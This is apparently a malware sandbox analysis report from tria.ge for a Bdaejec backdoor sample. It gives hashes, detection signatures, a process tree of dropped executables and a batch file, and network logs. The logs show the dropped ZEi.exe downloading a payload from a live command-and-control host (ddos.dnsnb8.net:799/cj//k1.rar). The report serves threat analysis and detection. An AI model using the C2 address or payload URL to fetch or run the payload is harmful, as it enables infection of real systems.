Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

3

2025-01-08...mi.exe

windows7-x64

10

2025-01-08...mi.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    119s
  • max time network
    120s
  • platform
    windows7_x64
  • resource
    win7-20240729-en
  • resource tags

    arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system
  • submitted
    08/01/2025, 10:23 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    2025-01-08_7704419fd579bfdc1388adadef8d2907_smoke-loader_wapomi.exe

  • Size

    80KB

  • MD5

    7704419fd579bfdc1388adadef8d2907

  • SHA1

    3355e0bc95f6358d63c6627c23802bc180384fd9

  • SHA256

    71d62ba662ba5220d5b0406d5005888d333aa2470cc437077627a7340e1d68a4

  • SHA512

    2a37146e6f64fbc166e2d126a27cf13ad682848d8f0cd31380395ba7879b6d88cc51764ca98e17857de2df05a12c1747314a5051b863aeaea104d9e66a9b281b

  • SSDEEP

    1536:2HB0UxMkzOt7HcvJGt5AdHIOWnToIf12Zi9GCq2iW7z:2hAWJGSCTBf12ZuGCH

Score
10/10
bdaejecaspackv2backdoordiscovery

Malware Config

Extracted

Family

bdaejec

C2

ddos.dnsnb8.net

Signatures

  • Bdaejec

    Bdaejec is a backdoor written in C++.

    backdoorbdaejec
  • Bdaejec family
    bdaejec
  • Detects Bdaejec Backdoor. 2 IoCs

    Bdaejec is backdoor written in C++.

  • ASPack v2.12-2.42 1 IoCs

    Detects executables packed with ASPack v2.12-2.42

    aspackv2
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 2 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\2025-01-08_7704419fd579bfdc1388adadef8d2907_smoke-loader_wapomi.exe
    "C:\Users\Admin\AppData\Local\Temp\2025-01-08_7704419fd579bfdc1388adadef8d2907_smoke-loader_wapomi.exe"
    1⤵
    • Loads dropped DLL
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:2680
    • C:\Users\Admin\AppData\Local\Temp\ZEi.exe
      C:\Users\Admin\AppData\Local\Temp\ZEi.exe
      2⤵
      • Executes dropped EXE
      • Drops file in Program Files directory
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2792
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\42735f85.bat" "
        3⤵
        • System Location Discovery: System Language Discovery
        PID:2620

Network

  • flag-us
    DNS
    ddos.dnsnb8.net
    ZEi.exe
    Remote address:
    8.8.8.8:53
    Request
    ddos.dnsnb8.net
    IN A
    Response
    ddos.dnsnb8.net
    IN A
    44.221.84.105
  • flag-us
    GET
    http://ddos.dnsnb8.net:799/cj//k1.rar
    ZEi.exe
    Remote address:
    44.221.84.105:799
    Request
    GET /cj//k1.rar HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
    Host: ddos.dnsnb8.net:799
    Connection: Keep-Alive
  • flag-us
    GET
    http://ddos.dnsnb8.net:799/cj//k1.rar
    ZEi.exe
    Remote address:
    44.221.84.105:799
    Request
    GET /cj//k1.rar HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
    Host: ddos.dnsnb8.net:799
    Connection: Keep-Alive
  • flag-us
    GET
    http://ddos.dnsnb8.net:799/cj//k1.rar
    ZEi.exe
    Remote address:
    44.221.84.105:799
    Request
    GET /cj//k1.rar HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
    Host: ddos.dnsnb8.net:799
    Connection: Keep-Alive
  • flag-us
    GET
    http://ddos.dnsnb8.net:799/cj//k1.rar
    ZEi.exe
    Remote address:
    44.221.84.105:799
    Request
    GET /cj//k1.rar HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
    Host: ddos.dnsnb8.net:799
    Connection: Keep-Alive
  • flag-us
    GET
    http://ddos.dnsnb8.net:799/cj//k1.rar
    ZEi.exe
    Remote address:
    44.221.84.105:799
    Request
    GET /cj//k1.rar HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
    Host: ddos.dnsnb8.net:799
    Connection: Keep-Alive
  • 44.221.84.105:799
    http://ddos.dnsnb8.net:799/cj//k1.rar
    http
    ZEi.exe
    466 B
     176 B
     3
    4

    HTTP Request

    GET http://ddos.dnsnb8.net:799/cj//k1.rar
  • 44.221.84.105:799
    http://ddos.dnsnb8.net:799/cj//k1.rar
    http
    ZEi.exe
    466 B
     176 B
     3
    4

    HTTP Request

    GET http://ddos.dnsnb8.net:799/cj//k1.rar
  • 44.221.84.105:799
    http://ddos.dnsnb8.net:799/cj//k1.rar
    http
    ZEi.exe
    466 B
     176 B
     3
    4

    HTTP Request

    GET http://ddos.dnsnb8.net:799/cj//k1.rar
  • 44.221.84.105:799
    http://ddos.dnsnb8.net:799/cj//k1.rar
    http
    ZEi.exe
    466 B
     176 B
     3
    4

    HTTP Request

    GET http://ddos.dnsnb8.net:799/cj//k1.rar
  • 44.221.84.105:799
    http://ddos.dnsnb8.net:799/cj//k1.rar
    http
    ZEi.exe
    466 B
     176 B
     3
    4

    HTTP Request

    GET http://ddos.dnsnb8.net:799/cj//k1.rar
  • 8.8.8.8:53
    ddos.dnsnb8.net
    dns
    ZEi.exe
    61 B
     77 B
     1
    1

    DNS Request

    ddos.dnsnb8.net

    DNS Response

    44.221.84.105

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\42735f85.bat
    Filesize

    181B

    MD5

    6e41efd64b5d48e3153a15d1e38dfb6a

    SHA1

    377f6992eea1f25497497e26957bf57d649373c5

    SHA256

    ad9f993e8a041b397a6cc21242a5cd845fee515cf08769ca45be6fe8083f43a1

    SHA512

    5529596ba809dd40b9a205674d13cf6cd3e3979912d505c8bf162860168a9355f7dbf6260798d27f2f7e36b10378a0bb1c1bd721e19b6cdcf7f274d9d286130b

    Download Submit

  • \Users\Admin\AppData\Local\Temp\ZEi.exe
    Filesize

    15KB

    MD5

    56b2c3810dba2e939a8bb9fa36d3cf96

    SHA1

    99ee31cd4b0d6a4b62779da36e0eeecdd80589fc

    SHA256

    4354970ccc7cd6bb16318f132c34f6a1b3d5c2ea7ff53e1c9271905527f2db07

    SHA512

    27812a9a034d7bd2ca73b337ae9e0b6dc79c38cfd1a2c6ac9d125d3cc8fa563c401a40d22155811d5054e5baa8cf8c8e7e03925f25fa856a9ba9dea708d15b4e

    Download Submit

  • memory/2680-0-0x0000000000400000-0x0000000000415000-memory.dmp

    Filesize

    84KB

    Download

  • memory/2680-4-0x0000000000230000-0x0000000000239000-memory.dmp

    Filesize

    36KB

    Download

  • memory/2680-25-0x0000000000400000-0x0000000000415000-memory.dmp

    Filesize

    84KB

    Download

  • memory/2680-26-0x0000000000400000-0x0000000000415000-memory.dmp

    Filesize

    84KB

    Download

  • memory/2680-27-0x0000000000230000-0x0000000000239000-memory.dmp

    Filesize

    36KB

    Download

  • memory/2792-11-0x0000000000E10000-0x0000000000E19000-memory.dmp

    Filesize

    36KB

    Download

  • memory/2792-23-0x0000000000E10000-0x0000000000E19000-memory.dmp

    Filesize

    36KB

    Download

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.